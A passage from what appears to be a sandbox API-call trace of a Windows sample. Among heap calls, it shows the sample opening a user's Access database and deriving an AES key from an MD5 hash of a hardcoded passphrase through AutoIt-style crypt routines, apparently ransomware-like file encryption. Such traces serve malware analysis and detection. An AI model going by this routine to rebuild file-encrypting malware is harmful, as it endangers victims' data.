lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0076.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0076.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0076.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0076.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0076.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0076.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0076.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0076.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0076.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0076.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0076.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0076.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0076.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0076.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0076.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0076.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0076.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0076.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0076.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0076.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0076.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0076.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359a68 | out: hHeap=0x1780000) returned 1 [0076.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0076.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0076.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0076.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0076.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0076.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0076.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0076.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0076.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0076.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0076.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0076.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0076.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0076.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0076.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0076.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0076.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0076.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0076.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0076.209] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9e18, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0076.210] CloseHandle (hObject=0x298) returned 1 [0076.210] FreeLibrary (hLibModule=0x772d0000) returned 1 [0076.210] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0076.210] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Database1.accdb", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3340555c, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3396299d, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x9daec75b, ftLastWriteTime.dwHighDateTime=0x1d3aafb, nFileSizeHigh=0x0, nFileSizeLow=0x55000, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="Database1.accdb", cAlternateFileName="DATABA~1.ACC")) returned 0x41ac640 [0076.210] FindClose (in: hFindFile=0x41ac640 | out: hFindFile=0x41ac640) returned 1 [0076.210] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0076.210] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.211] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0076.211] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.211] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0076.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796e08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0076.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0076.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796fc8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0076.211] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0076.212] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0076.212] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0076.212] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0076.212] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0076.212] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.212] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0076.212] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.212] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0076.212] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0076.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca748, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0076.212] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0076.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0076.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2668, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0076.215] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0076.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0076.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2c08, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0076.215] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.215] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0076.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca910, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0076.215] CryptHashData (hHash=0x41ac600, pbData=0x17e2b18, dwDataLen=0x22, dwFlags=0x1) returned 1 [0076.215] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.215] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0076.215] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0076.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca778, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0076.216] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac600, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac180) returned 1 [0076.216] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.216] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0076.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797088, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0076.216] CryptDestroyHash (hHash=0x41ac600) returned 1 [0076.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0076.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9818 [0076.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0076.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0076.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0076.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0076.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0076.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0076.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0076.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0076.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0076.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0076.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0076.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0076.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0076.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0076.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0076.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0076.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0076.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0076.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea508 [0076.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0076.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0076.217] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0076.217] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0076.217] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0076.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0076.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0076.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0076.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0076.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0076.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0076.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0076.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0076.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0076.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb3a8 [0076.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0076.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0076.219] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Database1.accdb" (normalized: "c:\\users\\fd1hvy\\documents\\database1.accdb"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0076.219] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.219] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0076.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0076.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0076.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0076.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0076.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0076.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0076.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0076.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0076.219] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0076.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0076.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0076.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0076.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0076.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0076.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0076.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0076.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0076.220] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0076.220] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0076.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0076.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0076.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0076.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0076.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0076.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0076.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0076.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0076.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0076.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0076.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0076.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0076.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0076.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0076.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0076.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0076.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0076.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0076.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0076.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0076.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0076.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0076.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0076.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0076.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0076.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0076.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0076.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43597f8 [0076.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0076.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0076.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0076.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0076.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43597f8 | out: hHeap=0x1780000) returned 1 [0076.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0076.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0076.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0076.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0076.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0076.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0076.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0076.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0076.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 